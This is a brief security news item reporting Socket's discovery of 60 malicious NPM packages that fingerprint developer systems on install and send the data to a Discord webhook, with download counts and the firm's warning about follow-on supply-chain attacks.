Security firm Socket discovered an active campaign targeting developers through 60 malicious NPM packages that steal system data when installed. Over two weeks, threat actors published packages containing scripts that collect hostnames, IP addresses, DNS servers, and directory paths, sending everything to a Discord webhook.
The packages have been downloaded over 3,000 times across Windows, Linux, and macOS systems. Three NPM accounts published 20 packages each, all containing identical fingerprinting code designed to evade detection.
Socket warns this data helps attackers map internal developer networks to public infrastructure, enabling future supply chain attacks and targeted intrusions.
Source: Security Week